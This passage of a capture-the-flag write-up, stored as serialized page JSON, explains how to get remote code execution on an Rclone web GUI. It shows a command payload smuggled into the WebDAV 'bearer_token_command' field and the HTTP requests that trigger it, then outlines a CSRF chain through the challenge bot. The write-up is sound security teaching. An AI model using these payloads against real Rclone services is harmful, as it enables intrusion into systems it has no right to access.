\\\n",{"type":33,"tag":128,"props":23072,"children":23073},{"class":130,"line":1063},[23074],{"type":33,"tag":128,"props":23075,"children":23076},{"style":323},[23077],{"type":38,"value":23078},"    mv $RCLONE_NAME/rclone /usr/bin\n",{"type":33,"tag":128,"props":23080,"children":23081},{"class":130,"line":1076},[23082],{"type":33,"tag":128,"props":23083,"children":23084},{"emptyLinePlaceholder":896},[23085],{"type":38,"value":899},{"type":33,"tag":128,"props":23087,"children":23088},{"class":130,"line":1089},[23089,23094],{"type":33,"tag":128,"props":23090,"children":23091},{"style":1576},[23092],{"type":38,"value":23093},"COPY",{"type":33,"tag":128,"props":23095,"children":23096},{"style":323},[23097],{"type":38,"value":23098}," ./readflag 
/readflag\n",{"type":33,"tag":128,"props":23100,"children":23101},{"class":130,"line":1101},[23102,23106],{"type":33,"tag":128,"props":23103,"children":23104},{"style":1576},[23105],{"type":38,"value":22949},{"type":33,"tag":128,"props":23107,"children":23108},{"style":323},[23109],{"type":38,"value":23110}," chmod 111 /readflag\n",{"type":33,"tag":128,"props":23112,"children":23113},{"class":130,"line":1114},[23114],{"type":33,"tag":128,"props":23115,"children":23116},{"emptyLinePlaceholder":896},[23117],{"type":38,"value":899},{"type":33,"tag":128,"props":23119,"children":23120},{"class":130,"line":1127},[23121,23125],{"type":33,"tag":128,"props":23122,"children":23123},{"style":1576},[23124],{"type":38,"value":22949},{"type":33,"tag":128,"props":23126,"children":23127},{"style":323},[23128],{"type":38,"value":23129}," useradd -ms /bin/bash ctf\n",{"type":33,"tag":128,"props":23131,"children":23132},{"class":130,"line":1139},[23133,23138],{"type":33,"tag":128,"props":23134,"children":23135},{"style":1576},[23136],{"type":38,"value":23137},"USER",{"type":33,"tag":128,"props":23139,"children":23140},{"style":323},[23141],{"type":38,"value":23142}," ctf\n",{"type":33,"tag":128,"props":23144,"children":23145},{"class":130,"line":1152},[23146],{"type":33,"tag":128,"props":23147,"children":23148},{"emptyLinePlaceholder":896},[23149],{"type":38,"value":899},{"type":33,"tag":128,"props":23151,"children":23152},{"class":130,"line":1165},[23153,23158,23162,23167,23172,23177],{"type":33,"tag":128,"props":23154,"children":23155},{"style":1576},[23156],{"type":38,"value":23157},"ENTRYPOINT",{"type":33,"tag":128,"props":23159,"children":23160},{"style":323},[23161],{"type":38,"value":718},{"type":33,"tag":128,"props":23163,"children":23164},{"style":140},[23165],{"type":38,"value":23166},"\"tini\"",{"type":33,"tag":128,"props":23168,"children":23169},{"style":323},[23170],{"type":38,"value":23171},", 
",{"type":33,"tag":128,"props":23173,"children":23174},{"style":140},[23175],{"type":38,"value":23176},"\"--\"",{"type":33,"tag":128,"props":23178,"children":23179},{"style":323},[23180],{"type":38,"value":3262},{"type":33,"tag":128,"props":23182,"children":23183},{"class":130,"line":1177},[23184,23189],{"type":33,"tag":128,"props":23185,"children":23186},{"style":1576},[23187],{"type":38,"value":23188},"CMD",{"type":33,"tag":128,"props":23190,"children":23191},{"style":323},[23192],{"type":38,"value":23193}," rclone rcd --rc-addr 0.0.0.0:5572 --rc-web-gui --rc-user $SECRET --rc-pass $SECRET --rc-web-gui-no-open-browser\n",{"type":33,"tag":47,"props":23195,"children":23196},{},[23197],{"type":38,"value":23198},"The bot, on the other hand, does nothing but authenticate itself on the Rclone service and visit the page that is passed in the body of the post request.",{"type":33,"tag":114,"props":23200,"children":23201},{"lang":5526},[23202],{"type":33,"tag":119,"props":23203,"children":23205},{"code":23204,"language":5526,"meta":8,"className":5530,"style":8},"[...]\napp.post('/submit', async (req, res) => {\n    const { url } = req.body\n[...]\n    try {\n        console.log(`[+] Sending ${url} to bot`)\n        await visit(url)\n        res.send('OK')\n    } catch (e) {\n        [...]\n    
}\n})\n[...]\n",[23206],{"type":33,"tag":105,"props":23207,"children":23208},{"__ignoreMap":8},[23209,23217,23286,23322,23329,23340,23393,23417,23455,23483,23491,23498,23506],{"type":33,"tag":128,"props":23210,"children":23211},{"class":130,"line":131},[23212],{"type":33,"tag":128,"props":23213,"children":23214},{"style":312},[23215],{"type":38,"value":23216},"[...]\n",{"type":33,"tag":128,"props":23218,"children":23219},{"class":130,"line":362},[23220,23225,23229,23233,23237,23241,23246,23250,23254,23258,23262,23266,23270,23274,23278,23282],{"type":33,"tag":128,"props":23221,"children":23222},{"style":306},[23223],{"type":38,"value":23224},"app",{"type":33,"tag":128,"props":23226,"children":23227},{"style":312},[23228],{"type":38,"value":215},{"type":33,"tag":128,"props":23230,"children":23231},{"style":135},[23232],{"type":38,"value":5561},{"type":33,"tag":128,"props":23234,"children":23235},{"style":312},[23236],{"type":38,"value":5566},{"type":33,"tag":128,"props":23238,"children":23239},{"style":676},[23240],{"type":38,"value":6040},{"type":33,"tag":128,"props":23242,"children":23243},{"style":140},[23244],{"type":38,"value":23245},"/submit",{"type":33,"tag":128,"props":23247,"children":23248},{"style":676},[23249],{"type":38,"value":6040},{"type":33,"tag":128,"props":23251,"children":23252},{"style":312},[23253],{"type":38,"value":5584},{"type":33,"tag":128,"props":23255,"children":23256},{"style":300},[23257],{"type":38,"value":5598},{"type":33,"tag":128,"props":23259,"children":23260},{"style":312},[23261],{"type":38,"value":2852},{"type":33,"tag":128,"props":23263,"children":23264},{"style":306},[23265],{"type":38,"value":5607},{"type":33,"tag":128,"props":23267,"children":23268},{"style":312},[23269],{"type":38,"value":5584},{"type":33,"tag":128,"props":23271,"children":23272},{"style":306},[23273],{"type":38,"value":5616},{"type":33,"tag":128,"props":23275,"children":23276},{"style":312},[23277],{"type":38,"value":2966},{"type":33,"tag":128,"props":23279,
"children":23280},{"style":312},[23281],{"type":38,"value":5625},{"type":33,"tag":128,"props":23283,"children":23284},{"style":312},[23285],{"type":38,"value":762},{"type":33,"tag":128,"props":23287,"children":23288},{"class":130,"line":403},[23289,23293,23297,23301,23305,23309,23313,23317],{"type":33,"tag":128,"props":23290,"children":23291},{"style":300},[23292],{"type":38,"value":5696},{"type":33,"tag":128,"props":23294,"children":23295},{"style":312},[23296],{"type":38,"value":5642},{"type":33,"tag":128,"props":23298,"children":23299},{"style":306},[23300],{"type":38,"value":15126},{"type":33,"tag":128,"props":23302,"children":23303},{"style":312},[23304],{"type":38,"value":5652},{"type":33,"tag":128,"props":23306,"children":23307},{"style":312},[23308],{"type":38,"value":5657},{"type":33,"tag":128,"props":23310,"children":23311},{"style":306},[23312],{"type":38,"value":5662},{"type":33,"tag":128,"props":23314,"children":23315},{"style":312},[23316],{"type":38,"value":215},{"type":33,"tag":128,"props":23318,"children":23319},{"style":306},[23320],{"type":38,"value":23321},"body\n",{"type":33,"tag":128,"props":23323,"children":23324},{"class":130,"line":739},[23325],{"type":33,"tag":128,"props":23326,"children":23327},{"style":312},[23328],{"type":38,"value":23216},{"type":33,"tag":128,"props":23330,"children":23331},{"class":130,"line":765},[23332,23336],{"type":33,"tag":128,"props":23333,"children":23334},{"style":1576},[23335],{"type":38,"value":16034},{"type":33,"tag":128,"props":23337,"children":23338},{"style":312},[23339],{"type":38,"value":762},{"type":33,"tag":128,"props":23341,"children":23342},{"class":130,"line":804},[23343,23347,23351,23355,23359,23363,23368,23372,23376,23380,23385,23389],{"type":33,"tag":128,"props":23344,"children":23345},{"style":306},[23346],{"type":38,"value":16105},{"type":33,"tag":128,"props":23348,"children":23349},{"style":312},[23350],{"type":38,"value":215},{"type":33,"tag":128,"props":23352,"children":23353},{"style":135}
,[23354],{"type":38,"value":13157},{"type":33,"tag":128,"props":23356,"children":23357},{"style":312},[23358],{"type":38,"value":5566},{"type":33,"tag":128,"props":23360,"children":23361},{"style":676},[23362],{"type":38,"value":5739},{"type":33,"tag":128,"props":23364,"children":23365},{"style":140},[23366],{"type":38,"value":23367},"[+] Sending ",{"type":33,"tag":128,"props":23369,"children":23370},{"style":1576},[23371],{"type":38,"value":5720},{"type":33,"tag":128,"props":23373,"children":23374},{"style":140},[23375],{"type":38,"value":13952},{"type":33,"tag":128,"props":23377,"children":23378},{"style":1576},[23379],{"type":38,"value":5730},{"type":33,"tag":128,"props":23381,"children":23382},{"style":140},[23383],{"type":38,"value":23384}," to bot",{"type":33,"tag":128,"props":23386,"children":23387},{"style":676},[23388],{"type":38,"value":5739},{"type":33,"tag":128,"props":23390,"children":23391},{"style":312},[23392],{"type":38,"value":2427},{"type":33,"tag":128,"props":23394,"children":23395},{"class":130,"line":839},[23396,23400,23405,23409,23413],{"type":33,"tag":128,"props":23397,"children":23398},{"style":1576},[23399],{"type":38,"value":17718},{"type":33,"tag":128,"props":23401,"children":23402},{"style":135},[23403],{"type":38,"value":23404}," visit",{"type":33,"tag":128,"props":23406,"children":23407},{"style":312},[23408],{"type":38,"value":5566},{"type":33,"tag":128,"props":23410,"children":23411},{"style":306},[23412],{"type":38,"value":13952},{"type":33,"tag":128,"props":23414,"children":23415},{"style":312},[23416],{"type":38,"value":2427},{"type":33,"tag":128,"props":23418,"children":23419},{"class":130,"line":848},[23420,23425,23429,23434,23438,23442,23447,23451],{"type":33,"tag":128,"props":23421,"children":23422},{"style":306},[23423],{"type":38,"value":23424},"        
res",{"type":33,"tag":128,"props":23426,"children":23427},{"style":312},[23428],{"type":38,"value":215},{"type":33,"tag":128,"props":23430,"children":23431},{"style":135},[23432],{"type":38,"value":23433},"send",{"type":33,"tag":128,"props":23435,"children":23436},{"style":312},[23437],{"type":38,"value":5566},{"type":33,"tag":128,"props":23439,"children":23440},{"style":676},[23441],{"type":38,"value":6040},{"type":33,"tag":128,"props":23443,"children":23444},{"style":140},[23445],{"type":38,"value":23446},"OK",{"type":33,"tag":128,"props":23448,"children":23449},{"style":676},[23450],{"type":38,"value":6040},{"type":33,"tag":128,"props":23452,"children":23453},{"style":312},[23454],{"type":38,"value":2427},{"type":33,"tag":128,"props":23456,"children":23457},{"class":130,"line":976},[23458,23462,23466,23470,23475,23479],{"type":33,"tag":128,"props":23459,"children":23460},{"style":312},[23461],{"type":38,"value":14264},{"type":33,"tag":128,"props":23463,"children":23464},{"style":1576},[23465],{"type":38,"value":6855},{"type":33,"tag":128,"props":23467,"children":23468},{"style":312},[23469],{"type":38,"value":2852},{"type":33,"tag":128,"props":23471,"children":23472},{"style":306},[23473],{"type":38,"value":23474},"e",{"type":33,"tag":128,"props":23476,"children":23477},{"style":312},[23478],{"type":38,"value":2966},{"type":33,"tag":128,"props":23480,"children":23481},{"style":312},[23482],{"type":38,"value":762},{"type":33,"tag":128,"props":23484,"children":23485},{"class":130,"line":988},[23486],{"type":33,"tag":128,"props":23487,"children":23488},{"style":312},[23489],{"type":38,"value":23490},"        
[...]\n",{"type":33,"tag":128,"props":23492,"children":23493},{"class":130,"line":1001},[23494],{"type":33,"tag":128,"props":23495,"children":23496},{"style":312},[23497],{"type":38,"value":6760},{"type":33,"tag":128,"props":23499,"children":23500},{"class":130,"line":1014},[23501],{"type":33,"tag":128,"props":23502,"children":23503},{"style":312},[23504],{"type":38,"value":23505},"})\n",{"type":33,"tag":128,"props":23507,"children":23508},{"class":130,"line":1026},[23509],{"type":33,"tag":128,"props":23510,"children":23511},{"style":312},[23512],{"type":38,"value":23216},{"type":33,"tag":114,"props":23514,"children":23515},{"lang":5526},[23516],{"type":33,"tag":119,"props":23517,"children":23519},{"code":23518,"language":5526,"meta":8,"className":5530,"style":8},"const visit = async url => {\n[...]\n        context = await browser.createBrowserContext()\n\n        const page1 = await context.newPage()\n        await page1.goto(LOGIN_URL)\n        await page1.close()\n\n        const page2 = await context.newPage()\n        await Promise.race([\n            page2.goto(url, {\n                waitUntil: 'networkidle0'\n            }),\n            sleep(5000)\n        
])\n[...]\n}\n",[23520],{"type":33,"tag":105,"props":23521,"children":23522},{"__ignoreMap":8},[23523,23554,23561,23595,23602,23640,23673,23697,23704,23740,23765,23797,23822,23830,23851,23859,23866],{"type":33,"tag":128,"props":23524,"children":23525},{"class":130,"line":131},[23526,23530,23534,23538,23542,23546,23550],{"type":33,"tag":128,"props":23527,"children":23528},{"style":300},[23529],{"type":38,"value":15973},{"type":33,"tag":128,"props":23531,"children":23532},{"style":135},[23533],{"type":38,"value":23404},{"type":33,"tag":128,"props":23535,"children":23536},{"style":312},[23537],{"type":38,"value":5657},{"type":33,"tag":128,"props":23539,"children":23540},{"style":300},[23541],{"type":38,"value":5598},{"type":33,"tag":128,"props":23543,"children":23544},{"style":306},[23545],{"type":38,"value":15126},{"type":33,"tag":128,"props":23547,"children":23548},{"style":312},[23549],{"type":38,"value":5625},{"type":33,"tag":128,"props":23551,"children":23552},{"style":312},[23553],{"type":38,"value":762},{"type":33,"tag":128,"props":23555,"children":23556},{"class":130,"line":362},[23557],{"type":33,"tag":128,"props":23558,"children":23559},{"style":312},[23560],{"type":38,"value":23216},{"type":33,"tag":128,"props":23562,"children":23563},{"class":130,"line":403},[23564,23569,23573,23577,23582,23586,23591],{"type":33,"tag":128,"props":23565,"children":23566},{"style":306},[23567],{"type":38,"value":23568},"        context",{"type":33,"tag":128,"props":23570,"children":23571},{"style":312},[23572],{"type":38,"value":5657},{"type":33,"tag":128,"props":23574,"children":23575},{"style":1576},[23576],{"type":38,"value":5796},{"type":33,"tag":128,"props":23578,"children":23579},{"style":306},[23580],{"type":38,"value":23581}," 
browser",{"type":33,"tag":128,"props":23583,"children":23584},{"style":312},[23585],{"type":38,"value":215},{"type":33,"tag":128,"props":23587,"children":23588},{"style":135},[23589],{"type":38,"value":23590},"createBrowserContext",{"type":33,"tag":128,"props":23592,"children":23593},{"style":312},[23594],{"type":38,"value":7857},{"type":33,"tag":128,"props":23596,"children":23597},{"class":130,"line":739},[23598],{"type":33,"tag":128,"props":23599,"children":23600},{"emptyLinePlaceholder":896},[23601],{"type":38,"value":899},{"type":33,"tag":128,"props":23603,"children":23604},{"class":130,"line":765},[23605,23609,23614,23618,23622,23627,23631,23636],{"type":33,"tag":128,"props":23606,"children":23607},{"style":300},[23608],{"type":38,"value":15121},{"type":33,"tag":128,"props":23610,"children":23611},{"style":306},[23612],{"type":38,"value":23613}," page1",{"type":33,"tag":128,"props":23615,"children":23616},{"style":312},[23617],{"type":38,"value":5657},{"type":33,"tag":128,"props":23619,"children":23620},{"style":1576},[23621],{"type":38,"value":5796},{"type":33,"tag":128,"props":23623,"children":23624},{"style":306},[23625],{"type":38,"value":23626}," 
context",{"type":33,"tag":128,"props":23628,"children":23629},{"style":312},[23630],{"type":38,"value":215},{"type":33,"tag":128,"props":23632,"children":23633},{"style":135},[23634],{"type":38,"value":23635},"newPage",{"type":33,"tag":128,"props":23637,"children":23638},{"style":312},[23639],{"type":38,"value":7857},{"type":33,"tag":128,"props":23641,"children":23642},{"class":130,"line":804},[23643,23647,23651,23655,23660,23664,23669],{"type":33,"tag":128,"props":23644,"children":23645},{"style":1576},[23646],{"type":38,"value":17718},{"type":33,"tag":128,"props":23648,"children":23649},{"style":306},[23650],{"type":38,"value":23613},{"type":33,"tag":128,"props":23652,"children":23653},{"style":312},[23654],{"type":38,"value":215},{"type":33,"tag":128,"props":23656,"children":23657},{"style":135},[23658],{"type":38,"value":23659},"goto",{"type":33,"tag":128,"props":23661,"children":23662},{"style":312},[23663],{"type":38,"value":5566},{"type":33,"tag":128,"props":23665,"children":23666},{"style":306},[23667],{"type":38,"value":23668},"LOGIN_URL",{"type":33,"tag":128,"props":23670,"children":23671},{"style":312},[23672],{"type":38,"value":2427},{"type":33,"tag":128,"props":23674,"children":23675},{"class":130,"line":839},[23676,23680,23684,23688,23693],{"type":33,"tag":128,"props":23677,"children":23678},{"style":1576},[23679],{"type":38,"value":17718},{"type":33,"tag":128,"props":23681,"children":23682},{"style":306},[23683],{"type":38,"value":23613},{"type":33,"tag":128,"props":23685,"children":23686},{"style":312},[23687],{"type":38,"value":215},{"type":33,"tag":128,"props":23689,"children":23690},{"style":135},[23691],{"type":38,"value":23692},"close",{"type":33,"tag":128,"props":23694,"children":23695},{"style":312},[23696],{"type":38,"value":7857},{"type":33,"tag":128,"props":23698,"children":23699},{"class":130,"line":848},[23700],{"type":33,"tag":128,"props":23701,"children":23702},{"emptyLinePlaceholder":896},[23703],{"type":38,"value":899},{"type":33,"tag
":128,"props":23705,"children":23706},{"class":130,"line":976},[23707,23711,23716,23720,23724,23728,23732,23736],{"type":33,"tag":128,"props":23708,"children":23709},{"style":300},[23710],{"type":38,"value":15121},{"type":33,"tag":128,"props":23712,"children":23713},{"style":306},[23714],{"type":38,"value":23715}," page2",{"type":33,"tag":128,"props":23717,"children":23718},{"style":312},[23719],{"type":38,"value":5657},{"type":33,"tag":128,"props":23721,"children":23722},{"style":1576},[23723],{"type":38,"value":5796},{"type":33,"tag":128,"props":23725,"children":23726},{"style":306},[23727],{"type":38,"value":23626},{"type":33,"tag":128,"props":23729,"children":23730},{"style":312},[23731],{"type":38,"value":215},{"type":33,"tag":128,"props":23733,"children":23734},{"style":135},[23735],{"type":38,"value":23635},{"type":33,"tag":128,"props":23737,"children":23738},{"style":312},[23739],{"type":38,"value":7857},{"type":33,"tag":128,"props":23741,"children":23742},{"class":130,"line":988},[23743,23747,23751,23755,23760],{"type":33,"tag":128,"props":23744,"children":23745},{"style":1576},[23746],{"type":38,"value":17718},{"type":33,"tag":128,"props":23748,"children":23749},{"style":437},[23750],{"type":38,"value":13066},{"type":33,"tag":128,"props":23752,"children":23753},{"style":312},[23754],{"type":38,"value":215},{"type":33,"tag":128,"props":23756,"children":23757},{"style":135},[23758],{"type":38,"value":23759},"race",{"type":33,"tag":128,"props":23761,"children":23762},{"style":312},[23763],{"type":38,"value":23764},"([\n",{"type":33,"tag":128,"props":23766,"children":23767},{"class":130,"line":1001},[23768,23773,23777,23781,23785,23789,23793],{"type":33,"tag":128,"props":23769,"children":23770},{"style":306},[23771],{"type":38,"value":23772},"            
page2",{"type":33,"tag":128,"props":23774,"children":23775},{"style":312},[23776],{"type":38,"value":215},{"type":33,"tag":128,"props":23778,"children":23779},{"style":135},[23780],{"type":38,"value":23659},{"type":33,"tag":128,"props":23782,"children":23783},{"style":312},[23784],{"type":38,"value":5566},{"type":33,"tag":128,"props":23786,"children":23787},{"style":306},[23788],{"type":38,"value":13952},{"type":33,"tag":128,"props":23790,"children":23791},{"style":312},[23792],{"type":38,"value":5584},{"type":33,"tag":128,"props":23794,"children":23795},{"style":312},[23796],{"type":38,"value":762},{"type":33,"tag":128,"props":23798,"children":23799},{"class":130,"line":1014},[23800,23805,23809,23813,23818],{"type":33,"tag":128,"props":23801,"children":23802},{"style":437},[23803],{"type":38,"value":23804},"                waitUntil",{"type":33,"tag":128,"props":23806,"children":23807},{"style":312},[23808],{"type":38,"value":284},{"type":33,"tag":128,"props":23810,"children":23811},{"style":676},[23812],{"type":38,"value":6739},{"type":33,"tag":128,"props":23814,"children":23815},{"style":140},[23816],{"type":38,"value":23817},"networkidle0",{"type":33,"tag":128,"props":23819,"children":23820},{"style":676},[23821],{"type":38,"value":10313},{"type":33,"tag":128,"props":23823,"children":23824},{"class":130,"line":1026},[23825],{"type":33,"tag":128,"props":23826,"children":23827},{"style":312},[23828],{"type":38,"value":23829},"            }),\n",{"type":33,"tag":128,"props":23831,"children":23832},{"class":130,"line":1038},[23833,23838,23842,23847],{"type":33,"tag":128,"props":23834,"children":23835},{"style":135},[23836],{"type":38,"value":23837},"            
sleep",{"type":33,"tag":128,"props":23839,"children":23840},{"style":312},[23841],{"type":38,"value":5566},{"type":33,"tag":128,"props":23843,"children":23844},{"style":523},[23845],{"type":38,"value":23846},"5000",{"type":33,"tag":128,"props":23848,"children":23849},{"style":312},[23850],{"type":38,"value":2427},{"type":33,"tag":128,"props":23852,"children":23853},{"class":130,"line":1051},[23854],{"type":33,"tag":128,"props":23855,"children":23856},{"style":312},[23857],{"type":38,"value":23858},"        ])\n",{"type":33,"tag":128,"props":23860,"children":23861},{"class":130,"line":1063},[23862],{"type":33,"tag":128,"props":23863,"children":23864},{"style":312},[23865],{"type":38,"value":23216},{"type":33,"tag":128,"props":23867,"children":23868},{"class":130,"line":1076},[23869],{"type":33,"tag":128,"props":23870,"children":23871},{"style":312},[23872],{"type":38,"value":854},{"type":33,"tag":47,"props":23874,"children":23875},{},[23876],{"type":38,"value":23877},"Note that the submitted URL to the bot must just comply with the HTTP standards, namely http or https + :// + domain",{"type":33,"tag":47,"props":23879,"children":23880},{},[23881],{"type":38,"value":23882},"So in one thing, our only entry point is the bot, and given the name of the challenge which suggests RCE, we potentially need to RCE on the Rclone service.",{"type":33,"tag":40,"props":23884,"children":23886},{"id":23885},"rce",[23887],{"type":38,"value":23888},"RCE ?",{"type":33,"tag":47,"props":23890,"children":23891},{},[23892,23894,23901],{"type":38,"value":23893},"To begin, we will explore the ",{"type":33,"tag":53,"props":23895,"children":23898},{"href":23896,"rel":23897},"https://github.com/rclone/rclone",[57],[23899],{"type":38,"value":23900},"source code of Rclone",{"type":38,"value":23902},", with the aim of looking for places that might allow RCE.",{"type":33,"tag":47,"props":23904,"children":23905},{},[23906],{"type":38,"value":23907},"Quickly, we come across the WebDav service which 
has an option that allows commands to be executed.",{"type":33,"tag":75,"props":23909,"children":23911},{"imgSrc":23910},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721244501/writeups/rclone/webdav_exec_command.webp",[],{"type":33,"tag":47,"props":23913,"children":23914},{},[23915,23917,23923],{"type":38,"value":23916},"However, note the use of the split function, which breaks our option into arguments at every literal space in the command (the Go side is not running a shell, so a payload such as `bash -c touch /tmp/x` would be cut into separate, meaningless arguments). An effective method to avoid breaking the command is to use the ",{"type":33,"tag":105,"props":23918,"children":23920},{"className":23919},[],[23921],{"type":38,"value":23922},"IFS",{"type":38,"value":23924}," bash variable: the text `${IFS}` contains no literal space, so the Go split leaves it intact and hands bash exactly three arguments (`bash`, `-c`, `touch${IFS}/tmp/lolipop`). Only once bash interprets the command does `${IFS}` expand to whitespace (by default space, tab and newline) and word splitting turns it into the argument separator we need.",{"type":33,"tag":47,"props":23926,"children":23927},{},[23928],{"type":38,"value":23929},"We can quickly test these options to see if we can execute commands on the Rclone service with a basic payload.",{"type":33,"tag":114,"props":23931,"children":23932},{"lang":116},[23933],{"type":33,"tag":119,"props":23934,"children":23936},{"code":23935,"language":116,"meta":8,"className":121,"style":8},"bash -c touch${IFS}/tmp/lolipop\n",[23937],{"type":33,"tag":105,"props":23938,"children":23939},{"__ignoreMap":8},[23940],{"type":33,"tag":128,"props":23941,"children":23942},{"class":130,"line":131},[23943,23947,23951,23956,23960,23964,23968],{"type":33,"tag":128,"props":23944,"children":23945},{"style":135},[23946],{"type":38,"value":116},{"type":33,"tag":128,"props":23948,"children":23949},{"style":151},[23950],{"type":38,"value":8707},{"type":33,"tag":128,"props":23952,"children":23953},{"style":140},[23954],{"type":38,"value":23955}," 
touch",{"type":33,"tag":128,"props":23957,"children":23958},{"style":312},[23959],{"type":38,"value":5720},{"type":33,"tag":128,"props":23961,"children":23962},{"style":306},[23963],{"type":38,"value":23922},{"type":33,"tag":128,"props":23965,"children":23966},{"style":312},[23967],{"type":38,"value":5730},{"type":33,"tag":128,"props":23969,"children":23970},{"style":140},[23971],{"type":38,"value":23972},"/tmp/lolipop\n",{"type":33,"tag":47,"props":23974,"children":23975},{},[23976],{"type":38,"value":23977},"Our HTTP request to create the remote will look like this:",{"type":33,"tag":75,"props":23979,"children":23981},{"imgSrc":23980},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245298/writeups/rclone/rclone_create_webdav_command.webp",[],{"type":33,"tag":47,"props":23983,"children":23984},{},[23985],{"type":38,"value":23986},"Here is the HTTP request.\nWe can see that we have several parameters in the body of the request:",{"type":33,"tag":239,"props":23988,"children":23989},{},[23990,24008,24013],{"type":33,"tag":243,"props":23991,"children":23992},{},[23993,23995],{"type":38,"value":23994},"Parameters:\n",{"type":33,"tag":239,"props":23996,"children":23997},{},[23998,24003],{"type":33,"tag":243,"props":23999,"children":24000},{},[24001],{"type":38,"value":24002},"Url: defines the url of the webdav (in our case it doesn't matter if this url doesn't work)",{"type":33,"tag":243,"props":24004,"children":24005},{},[24006],{"type":38,"value":24007},"bearer_token_command: which will contain our bash payload that will be executed by the rclone service",{"type":33,"tag":243,"props":24009,"children":24010},{},[24011],{"type":38,"value":24012},"Name: which will correspond to the name of the remote",{"type":33,"tag":243,"props":24014,"children":24015},{},[24016],{"type":38,"value":24017},"Type: the type of remote we are using here is Webdav",{"type":33,"tag":119,"props":24019,"children":24021},{"code":24020},"POST /config/create HTTP/1.1\nHost: 
localhost:5572\nContent-Type: application/json\nAuthorization: Basic c2VjcmV0OnNlY3JldA==\nContent-Length: 167\n\n{\n  \"parameters\": {\n    \"url\": \"http://not_exist.localhost:9999\",\n    \"bearer_token_command\":\"bash -c touch${IFS}/tmp/lolipop\"\n  },\n  \"name\":\"test_webdav\",\n  \"type\":\"webdav\"\n}\n",[24022],{"type":33,"tag":105,"props":24023,"children":24024},{"__ignoreMap":8},[24025],{"type":38,"value":24020},{"type":33,"tag":47,"props":24027,"children":24028},{},[24029],{"type":38,"value":24030},"In order to execute our payload, it is necessary to open the config recently created and list the files present in the remote.",{"type":33,"tag":47,"props":24032,"children":24033},{},[24034],{"type":38,"value":24035},"For that we use the following request:",{"type":33,"tag":119,"props":24037,"children":24039},{"code":24038},"POST /operations/list HTTP/1.1\nHost: localhost:5572\nContent-Type: application/json\nAuthorization: Basic c2VjcmV0OnNlY3JldA==\nContent-Length: 33\n\n{\n  \"fs\":\"test_webdav:\",\n  \"remote\":\"\"\n}\n",[24040],{"type":33,"tag":105,"props":24041,"children":24042},{"__ignoreMap":8},[24043],{"type":38,"value":24038},{"type":33,"tag":75,"props":24045,"children":24047},{"imgSrc":24046},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245298/writeups/rclone/rclone_explorer.webp",[],{"type":33,"tag":47,"props":24049,"children":24050},{},[24051],{"type":38,"value":24052},"We can see that our file has been successfully created.",{"type":33,"tag":75,"props":24054,"children":24056},{"imgSrc":24055},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245280/writeups/rclone/ls_tmp.webp",[],{"type":33,"tag":47,"props":24058,"children":24059},{},[24060],{"type":38,"value":24061},"So we have a race on the rclone service, however for flag it is necessary to go through the bot.",{"type":33,"tag":47,"props":24063,"children":24064},{},[24065],{"type":38,"value":24066},"However, it is not possible for us to execute post requests with 
JavaScript, for example with fetch(), from a different origin: a cross-origin request is governed by CORS, so the browser will not attach the HTTP Basic credentials the bot already holds for the rclone origin unless rclone explicitly allows credentialed cross-origin requests, and instead of our action being performed a prompt asking to authenticate will be displayed. A top-level HTML form submission, however, is a plain navigation, not a CORS request: the browser automatically re-sends the Basic credentials it has cached for that origin. That is exactly what a CSRF exploits, and it is what we will look at in the next section.",{"type":33,"tag":40,"props":24068,"children":24070},{"id":24069},"gui-is-experimental",[24071],{"type":38,"value":24072},"GUI is experimental",{"type":33,"tag":47,"props":24074,"children":24075},{},[24076,24078,24085],{"type":38,"value":24077},"When we go to the ",{"type":33,"tag":53,"props":24079,"children":24082},{"href":24080,"rel":24081},"https://rclone.org/gui/",[57],[24083],{"type":38,"value":24084},"Rclone documentation",{"type":38,"value":24086},", we realize that the Gui option is marked as experimental.",{"type":33,"tag":75,"props":24088,"children":24090},{"imgSrc":24089},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245952/writeups/rclone/gui_experimental.webp",[],{"type":33,"tag":47,"props":24092,"children":24093},{},[24094,24096],{"type":38,"value":24095},"The documentation also gives us access to the front-end GitHub. 
",{"type":33,"tag":53,"props":24097,"children":24100},{"href":24098,"rel":24099},"https://github.com/rclone/rclone-webui-react",[57],[24101],{"type":38,"value":24102},"rclone-webui-react",{"type":33,"tag":47,"props":24104,"children":24105},{},[24106,24108,24115],{"type":38,"value":24107},"In the GitHub, we can see ",{"type":33,"tag":53,"props":24109,"children":24112},{"href":24110,"rel":24111},"https://github.com/rclone/rclone-webui-react/issues/128",[57],[24113],{"type":38,"value":24114},"an open issue",{"type":38,"value":24116}," indicating that Rclone-webui is potentially vulnerable to CSRF attacks.",{"type":33,"tag":75,"props":24118,"children":24120},{"imgSrc":24119},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245965/writeups/rclone/issue_csrf.webp",[],{"type":33,"tag":47,"props":24122,"children":24123},{},[24124],{"type":38,"value":24125},"A proof of concept is also provided, allowing us to understand that the parameters sent in the API's POST requests can also be sent in the query parameters.",{"type":33,"tag":47,"props":24127,"children":24128},{},[24129],{"type":38,"value":24130},"We therefore have the possibility from the bot to trigger a CSRF with our RCE payload that was created in the previous section. 
We can now test it with the bot in order to PoC the RCE via the bot.",{"type":33,"tag":47,"props":24132,"children":24133},{},[24134],{"type":38,"value":24135},"For this, we will create three files: two HTML files for CSRF and one index.html file that will allow us to open the two CSRF files, one to create the remote and one to trigger the RCE.",{"type":33,"tag":47,"props":24137,"children":24138},{},[24139],{"type":38,"value":24140},"We will use the same bash payload as before, but this time we will encode it in base64 to pass it as a query parameter.",{"type":33,"tag":114,"props":24142,"children":24143},{"lang":116},[24144],{"type":33,"tag":119,"props":24145,"children":24147},{"code":24146,"language":116,"meta":8,"className":121,"style":8},"bash -c 